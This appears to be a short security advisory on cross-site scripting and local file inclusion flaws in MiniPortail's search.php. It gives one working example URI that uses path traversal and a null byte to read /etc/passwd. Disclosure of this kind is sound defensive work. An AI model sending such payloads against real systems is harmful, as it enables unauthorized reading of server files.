MiniPortail 'search.php' Cross-Site Scripting and Local File Include Vulnerabilities

MiniPortail 'search.php' Cross-Site Scripting and Local File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/search.php?lng=../../../../../../etc/passwd%00